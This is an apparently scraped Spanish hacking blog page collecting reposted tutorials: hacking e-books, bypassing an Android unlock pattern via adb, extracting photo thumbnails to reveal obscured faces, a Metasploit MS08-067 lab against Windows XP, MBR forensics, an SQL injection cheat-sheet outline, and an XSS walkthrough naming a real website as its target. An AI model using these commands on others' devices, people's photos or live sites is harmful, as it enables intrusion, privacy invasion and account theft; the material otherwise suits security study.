Banner 1

5 E-BOOK Muy buenos sobre (Hacking)

0 comentarios

Hola hermanos en esta ocasión les traigo 5 libros muy buenos donde aprenderemos mas afondo lo que es este mundo del UNDERGROUND o como muchos se dice el MUNDO del HACKING en general.!

espero que los lean y comprendan muchas cosas lo que se puede hacer en el UNDERGROUND,

Libros:
* El arte de la intrusión
* Hacking Ético por - Carlos Tori
* El Libro Negro El Hacker
* Hacking y Cracking Con Google (Los Secretos de Google:)
* Manual de desobediencia a la Ley Sinde por Hacktivistas




1- El arte de la intrusión
Descarga:
Español | PDF | 390 Paginas | Autor: Kevin D. Mitnick “El Condor” | ISBN: 8478977481 |
2- Hacking Ético por - Carlos Tori    (RECOMENDADO)

Descarga:
Hacking Etico, es un libro de seguridad informática que cuenta con 328 páginas redactados con un lenguaje simple y ordenado.
Actualmente se encuentra agotado en Argentina, por ese motivo y otros, el autor decidió liberarlo para que los lectores pudieran apreciar la obra de modo libre sin pagar y a su vez, pudiéndola distribuir sin restricciones. 
En cuanto a su contenido, aquí puede leer el temario completo. 
Su ISBN es 978-987-05-4364-0 y todos sus derechos están registrados, como también su material.
3- El Libro Negro El Hacker
Descarga:
Cómo defender su PC de “Ataques” externos, virus, troyanos, escaneo de puertos, aplicaciones perniciosas.
Cuatro discos llenos de información, utilidades, vínculos a páginas Web.



4-Hacking y Cracking Con Google (Los Secretos de Google:)

Descarga:

Digerati | Spanish| PDF | 36.08MB | 100 Pages | ISBN 8589535436
Descubre todas las opciones ocultas de este potente buscador CÓMO FUNCIONA POR DENTRO - Coloca tu sitio web en los primeros puestos - Haz búsquedas avanzadas de textos e imágenes - Usa las herramientas del idioma - Accede a Google desde tu móvil - Y mucho más EL FINAL DE LA INTIMIDAD Descubre cómo Internet permite descubrir los datos personales de casi cualquier persona, localizar cartas y entregas, consultar datos telefónicos y buscar en bases de datos ocultas. HACKING CON GOOGLE Cómo saberlo todo sobre un sitio, y cómo conocer los datos personales de su dueño, sin ni siquiera invadirlo.
5- Manual de desobediencia a la Ley Sinde por Hacktivistas

Descarga:
Este Manual tiene el objetivo de demostrar la ineficacia radical de la Ley Sinde desde un punto de vista práctico. Los usuarios y webmasters encontrarán los métodos más útiles para sortear las barreras de la censura gubernamental. La llamada Ley Sinde ha despertado la oposición de diversos colectivos de ciudadanos tanto por la forma en la que se promovió, al margen de la ciudadanía; como por el hecho de que no responde a los objetivos que dice promover, la supuesta protección de creadores; como por las presiones externas de las industrias que en definitiva han acabado por imponerla. La oposición a la nueva legislación ha sido tan contundente y masiva que podemos decir sin tapujos que esta Ley no es representativa de la voluntad general ni está dirigida al bien común.
Este Manual de desobediencia a la Ley Sinde tiene el objetivo de demostrar la ineficacia radical de la Ley Sinde desde un punto de vista práctico. Los usuarios y webmasters encontrarán los métodos más útiles para sortear las barreras de la censura gubernamental. Hacktivistas.net ha creado este Manual para que la primera web que sea cerrada, se convierta en la más popular de la blogosfera. Para que sus contenidos, lejos de desaparecer, inunden la red. Porque mientras ellos crean comisiones de censura, nosotras y nosotros «rippeamos», subtitulamos, traducimos y compartimos. Es un acto natural que crece de nuestras acciones colectivas.
Porque la cultura quiere ser libre y lo será.
Bueno esto es todo se los recomiendo para que los leean. y comprenda lo que es estar en este mundo.! de mucha ARTE por que el HACKING ES UN ARTE.! 
Salud2: CyRuX

Fuente: http://blackophn.blogspot.com/2013/03/4-muy-buenos-e-book-hacking.html#more

Cómo saltar el patrón de desbloqueo de Android

0 comentarios
En la siguiente entrada veremos cómo obtener o eliminar un patrón de bloqueo de Android, siempre como prueba de concepto, así que nada de terminales robados ni de tomar prestado un momento el teléfono de la novia, que os conozco... XD
Como todos sabemos, en Android se utiliza ampliamente el patrón de grid en 3x3, en el que deberemos marcar un mínimo de cuatro puntos y en el que cada punto sólo puede ser utilizado una vez. Cada uno de estos puntos es indexado internamente de 1 a 9. Por ejemplo, en la imagen de la derecha el patrón de desbloqueo sería "2547896".

Este patrón se almacena como un hash SHA-1 en una cadena de bytes dentro del fichero/data/system/gesture.key. El problema es que Android no añade salt a los datos originales y, si tenemos en cuenta que tenemos un número finito de posibles patrones, crear y utilizar un diccionario de hashes válidos es algo muy trivial...

Obteniendo el patrón de desbloqueo

El fichero gesture.key se encuentra en un directorio que no es accesible normalmente, por lo que tendremos que acceder como root, es decir, el teléfono ha de encontrarse previamente rooteado. Además, para poder utilizar el SDK (adb) deberemos conectar el terminal a nuestro equipo y para ello tiene que estar activado el USB debugging. Si se dan estas dos circustancias los pasos son muy sencillos. A continuación veremos cómo hacerlo en un Windows 7 con un Samsung Galaxy S...

Primero conectamos el teléfono y comprobamos que nuestro dispositivo se reconoce correctamente:

D:\android-adt-bundle-windows\sdk\platform-tools>adb.exe devices
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
List of devices attached
303121D3C7E200EC        device


Ahora volcamos el contenido del fichero gesture.key a un fichero de texto en nuestro equipo:

D:\android-adt-bundle-windows\sdk\platform-tools>adb shell "su -c 'cat /data/system/gesture.key'" > prueba.txt
Después lo abrimos con nuestro editor hexadecimal favorito:

D:\android-adt-bundle-windows\sdk\platform-tools>"d:\Program Files (x86)\HxD\HxD.exe" prueba.txt

Copiamos el patrón del dispositvo:




Finalmente, buscamos el hash dentro del diccionario:





Como podéis comprobar, a la izquierda podemos ver el patrón de desbloqueo utilizado. Así de fácil.

Y ahora pensaréis "ya, y si el teléfono no está rooteado o no tiene el debugging activado?". Pues existe otra opción que sería obtener el contenido de la memoria flash mediante JTAG y buscar cada uno de los hashes del diccionario pre-compilado. Podéis descargar scripts en Python que automatizan esta tarea desde http://www.ccl-forensics.com/Software/other-software-a-scripts.html.

Desactivando el patrón de desbloqueo
Por último, existe otra opción que es evadir el patrón de desbloqueo. Para ello se puede:

1. desactivar:

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit


y/o eliminar:

adb shell rm /data/system/gesture.key

Fuentes:
Locked Out of Your Phone? Here's How You Bypass the Android Pattern Lock Screen 
Unlocking Android Pattern Locks
Cracking android lockscreens


Fuente original:
http://blackophn.blogspot.com/2013/11/como-comprometer-el-patron-de.html

Como extraer thumbnails de una imagen.

0 comentarios
Bueno, extraer de las fotografías los “datos exif” mejor conocidos como metadatos o thumbnail fue un éxito hace pocos años y sin duda mandaron a la fama al chema alonso xD.

En este caso vamos a ver un ejemplo sencillo:

Bajamos una imagen

¿Para que sirve?

Por ejemplo, los blogueros ponen una foto en su perfil o en su pagina, esta foto muestra los pies, los ojos o con paint se ponen unos rayones para que no se vea su horrible y deformado rostro, ahí es cuando entras tu, extraes el thumbnail que vendria siendo una foto original, pero en miniatura.

¿Cómo le hago?

El programa se llama jhead, primero tienes que saber que sistema operativo tienes (OS-X, Linux o Windows), en base a eso tienes que bajar la versión que te sirva(yo baje la de Windows), la utilidad la descargas de aquí:


y lo guardas en:

C:\Documents and Settings\starfox\

*donde starfox es el nombre de tu compu.
Ahora busca una fotografia y guardala en esa misma ubicación:

C:\Documents and Settings\starfox\

Abre simbolo de sistema o en ejecutar pon cmd.exe y se va a abrir una pantallita de ms-dos, no te asustes. Dira algo parecido a esto:

C:\Documents and Settings\starfox>

Luego escribe:

C:\Documents and Settings\starfox>jhead.exe 3.jpg

*3 es el nombre de la foto en este caso. 

Con esto podras ver si efectivamente la foto tiene o no thumbnail. La mayoria de fotos que son tomadas por camara digital tienen y las de celulares tambien. Si no tiene, te dice “header missing”. En caso contrario te dira hasta el modelo de la camara. Proseguimos tecleando lo siguiente:

C:\Documents and Settings\starfox>jhead.exe -st original 3.jpg

Respeta los espacios y el guion, "original" lo puedes cambiar por el nombre que quieras, una vez hecho esto, si quieres cierras el ms-dos y te vas a esta carpeta:

C:\Documents and Settings\starfox\

Se encuentra la foto “original”, con clic derecho te vas a cambiar nombre y le agregas “.jpg” esto es para que la puedas abrir.


¡Listo! 

Fuente:
http://desperdiciodebytes.blogspot.com/2009/12/guia-del-troll-como-extraer-thumbnails.html

Referencias:
http://www.sentex.net/~mwandel/jhead/usage.html
http://www.karmany.net/diseno-grafico/17-diseno-grafico-basico/19-metadatos-imageneshttp://www.kungfoosion.com/2009/01/los-metadatos-de-cristina.html

Laboratorio básico de metasploit (atacando un windows xp)

0 comentarios
Buenas tardes.

Estaba recolectando información sobre metasploit para realizar un post completo sobre el tema aunque estoy seguro que los manuales liberados en internet son mas que suficientes. La idea final es realizar pruebas con los últimos exploits publicados.

En esa labor encontré un tutorial muy bueno para empezar los laboratorios para principiantes que prácticamente es una explotación directa a una vulnerabilidad ya muy conocida en el ámbito del hacking.

Cabe anotar que tiene ya un tiempo y que actualmente se podría homologar usando kali y armitage"

Sin mas detalle:

Comencemos con los requisitos para tener todo listo

1. Tener 2 Maquinas Virtuales = Backtrack 4 R2 + Windows XP SP3
<- br="" o="" pueden="" usar="" virtualbox="" vmware="" workstation="">
2. Las 2 Maquinas deven estar en la misma Red. En Network Adapter : Bridge


Mi configuracion en XP SP3


Mi configuracion en Backtrack 4 R 2


3. Encender las 2 Maquinas y comprobar la Configuracion de la IP. Comando Ipconfig / Ifconfig




Como ven en XP -> 192.168.1.10 Backtrack -> 192.168.1.20

Configurar la IP en Windows --> Panel de Control : Conexiones de Red : Click derecho : Propiedades : TCP : Propiedades




Para configurar en Backtrack ->

Si no tienes activo eth0 = ifconfig eth0 up
Asignar una Ip = ifconfig eth0 192.168.1.20
Puerta de enlace = route add default gw 192.168.1.1
Comprobar todo = ifconfig





4. Usar el comando PING para probar conectividad.



:o:o:o:o:o:o


De Ahora en adelante usaremos el Backtrack para aplicar el metasploit y vulnerar XP ("Hackearlo")

[b]Algunas aclaraciones Previas :

- Desactivar el firewall de XP.
- El XP debe ser sin actualizaciones.

COMENCEMOS - TODO SE HACE POR CONSOLA

1. Actualizar el Metasploit : msfupdate <- a="" asi="" br="" de="" deves="" enlace="" esto="" haber="" internet.="" la="" para="" puerta="" puesto="" salida="" tener="" y="">
2. Termino de actualizar cargaremos el Metaploit por consola = msfconsole




3. Podemos ver todos los exploits que hay = show exploits

4. Buscaremos un exploit en especifico = search ms08 / Nos mostrara una lista de varios exploits

5. Usaremos el "exploit windows/smb/ms08_067_netapi" = use windows/smb/ms08_067_netapi




6. Miremos la informacion del Exploit, una ves dentro del exploit = info



7. Asignaremos a la variable RHOST la Ip victima = set RHOST 192.168.1.10

8. Comprobamos que se haya asignado = show options




9. Podemos ver los payloads compatible con este exploit : search payloads

10. Nosotros usaremos el payload "windows/vncinject/reverse_tcp" = set PAYLOAD windows/vncinject/reverse_tcp




11. Asignaremos a la variable LHOST nuestra IP : set LHOST 192.168.1.20

12. Comprobemos que todo este bien : show options




13. EL EXPLOIT :mad: = exploit





Fuente: http://masters-hackers.info/showthread.php?t=4921

Examenes (Humor)

0 comentarios
respuestas-examenes-divertidas-01

¿No sabemos que tan buenos estudiantes hayan sido o sean? Pero, no ay lugar a dudas que estas respuestas son de muy malos estudiantes, aunque muy ingeniosos, claro…
Chicos para lograr buenos resultados, la cuestión es simple: hay que estudiar, un buen estudiante requiere de altas dosis de constancia y esfuerzo. Los exámenes finalmente son el reflejo de este trabajo y esfuerzo.
Ahora sí, prepárense por que estas respuestas te harán morir de la risa, pero no creo que a sus profesores les cause la misma gracia.

respuestas-examenes-divertidas-02
respuestas-examenes-divertidas-03
respuestas-examenes-divertidas-04
respuestas-examenes-divertidas-05
respuestas-examenes-divertidas-06
respuestas-examenes-divertidas-07
respuestas-examenes-divertidas-08
respuestas-examenes-divertidas-09
respuestas-examenes-divertidas-10
respuestas-examenes-divertidas-11
respuestas-examenes-divertidas-12
respuestas-examenes-divertidas-13
respuestas-examenes-divertidas-14
respuestas-examenes-divertidas-15
respuestas-examenes-divertidas-16
respuestas-examenes-divertidas-17
respuestas-examenes-divertidas-18

Herramientas forense para ser un buen CSI. Parte LIII: MBR

0 comentarios
 Buenas a todos, en el post de hoy de "Herramientas forense para ser un buen CSI", os hablaremos del Master Boot Record, y de algunas herramientas que os serán de utilidad durante vuestros procesos de análisis pericial.
Del Master Boot Record, o MBR ya os hemos hablado en varias ocasiones en esta cadena de posts. Se trata del primer sector de un dispositivo de almacenamiento, como pueda ser un disco duro, utilizado para el arranque del sistema operativo y suele almacenar la tabla de particiones.

El MBR comprende los primeros 512 bytes (sector 0), y dentro de él se encuentra la tabla de particiones, alojada a partir del byte 446.
La tabla de particiones ocupa 64 bytes, conteniendo 4 registros de 16 bytes, los cuales definen las particiones primarias (estas a su vez pueden tener particiones extendidas). En ellas se almacena toda la información básica sobre la partición: si es arrancable, si no lo es, el formato, el tamaño y el sector de inicio.
El MBR, con la tabla de particiones, podremos recuperarlo con una gran cantidad de software, como por ejemplo la herramienta "dd", nativa en linux (o con su sucesor dc3dd) y que podremos descargar para Windows.
Ya os hemos hablado largo y tendido del software dd, por lo que simplemente a modo de recordatorio os dejamos sus parámetros básicos:
  • if=input file 
  • of=output file 
  • bs=sector 
  • count=nº 
Y os presentamos un ejemplo de clonado del MBR:

  • dd if=/dev/xxx of=mbr.backup bs=512 count=1 
Y un ejemplo sobre su restauración desde un backup del MBR:

  • dd if=mbr.backup of=/dev/xxx bs=512 count=1
Podremos ver con un editor hexadecimal el volcado del MBR. Un truco para ver que está todo correcto es ver si la tabla de particiones finaliza con "55AA".
Existe una herramienta muy útil desarrollada en perl, llamada "mbrparser.pl" y que podéis descargar gratuitamente desde aquí: http://www.garykessler.net/software/.
Mbrparser.pl nos ayudará a interpretar la tabla de particiones de una manera cómoda, cómo podéis ver en la siguiente captura:
Su uso es tan sencillo como lanzar la aplicación pasándole con el parámetro "-i" el volcado del MBR realizado con dd en el ejemplo anterior:
  • mbrparser.pl -i mbr.backup

Eso es todo por hoy, nos vemos en el próximo posts,

Fuente: http://www.flu-project.com/2014/08/herramientas-forense-para-ser-un-buen.html

Guía muy completa para inyecciones SQL

0 comentarios
Roberto Salgado (@LightOS) publicó hace tiempo una guía muy completa para inyecciones SQL. Cubre MySQL, MSSQL y ORACLE.

Su contenido es el siguiente:

MySQL
Default Databases
Testing Injection
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding quotations
String concatenation
Conditional Statements
Timing
Privileges
Reading Files
Writing Files
Out of band channeling
Stacked Queries with PDO
MySQL-specific code
Fuzzing and Obfuscation
Operators
Constants
Password Hashing
Password Cracker

MSSQL
Default Databases
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding quotations
String concatenation
Conditional Statements
Timing
OPENROWSET Attacks
System Command Execution
SP_PASSWORD (Hiding Query)
Stacked Queries
Fuzzing and Obfuscation
Password Hashing
Password Cracker

ORACLE
Default Databases
Comment Out Query
Testing Version
Database Credentials
Database Names
Server Hostname
Tables and Columns
Avoiding Quotations
String concatenation
Conditional Statements
Timing
Privileges
Out Of Band Channeling

Fuente: http://underc0de.org/foro/index.php?topic=14580.0

Cross Site Scripting (XSS) y Vectores de Evasion

0 comentarios

Cross Site Scripting (XSS) y Vectores de Evasion

Bueno Antes que Nada este es solo un modelo de las posibilidades que brinda esta vulnerabilidad
recomiendo utilizar Firefox ya que Chrome tiene un bloqueo de Pop-up que nos va a impedir explotar comodamente el fallo


A tener en Cuenta:

Existe 2 tipos de XSS (Cross Site Scripting) ambos se basan en la ejecucion de codigo JavaScript sin que el ClientSide este pendiente de que esto va a suceder.


Reflected:

Son Aquellos producidos por un reflejo del Vector ingresado en el codigo html, por ej: Impresion de la Busqueda en una Web


Stored:

Son Aquellos Cuyo Vector ingresado queda registrado y/o impreso directamente en el contenido html de la Web Afectada.

Un Ej de esto seria un comentario de Moderacion que se guarda en una base de datos de gestion web por un Panel de Administracion, para darle el visto bueno.

Al Ingresar por ej un Script del tipo no lo veriamos ejecutarce porq este esta pendiente de moderacion,
el Administrador al Ingresar al Panel de Moderacion este comentario se ejecutaria al momento de Moderar el Comentario. (Situacion Ideal)

Esto se puede utilizar para robar Cookies para luego lograr logearnos como ese Usuario.


Desarrollo:
En Fin Ambos Ataques se diferencian unicamente en el alcanse que poseen, XSS Reflected requiere un poco de ingenieria social para lograr nuestro Objetico

Hoy Vamos a Tomar como ejempo a http://www.napsix.com/ que posee un fallo de XSS Reflected que reportado numerosas veces sin tener respuestas ni ver Correccion del Bug.


Comencemos:

Abrimos en Nuestro Navegador http://www.napsix.com/ y vemos un flamante campo de Busqueda, interesado en ver que sucede ingreso un Vector de Busqueda.

Vector de Busqueda: >AQUI<

Inspeccionamos Elementos con Chrome y buscamos dentro del Codigo html la palabra AQUI




Vemos que no produce ningun tipo de Evacion ni Filtrado ante los caracteres ">" ni "<" esto da pie a pensar que vulnerable sin siquiera tener
que evadir con Double Encode.


Analicemos:



lo que intentaremos lograr es sacar nuestro Vector de Ataque fuera del input, como podemos ver la propiedad Value abre y cierra con doble comilla
intentaremos cerrar value, luego cerrar el input, injectar el vector y comentar el resto del codigo html


Escapando de la propiedad Value:

Para lograr esto en nuestro vector inyectaremos unas comillas dobles (")

esto quedara de la siguiente manera:



como podemos ver queda por demas al final de la etiqueta un " antes del cierre >


Escapando del Input:

Ahora escaparemos del input, la logica de lo que vemos dice q se cierra con un ">" pero con un conocimiento minimo de html sabremos que las etiquetas input se cierran con /> aunque el inspector de Elementos de Chrome diga lo contrario.

Inyectaremos como Vector ("/>)

y nos quedara de la siguiente manera:

(">)

Como vemos queda de mas al final de nuestro input "> esto producira un error de sintaxis por lo que deseamos eliminar esto ultimo
y lo vamos a lograr comentando el resto del codigo html

Por lo que agregaremos un

NOTA: revisar la fuente porque blogger daña los códigos.

Fuente: http://hdbreaker96.blogspot.com/2013/04/cross-site-scripting-xss-y-vectores-de.html
Powered by Bad Robot
Helped by Blackubay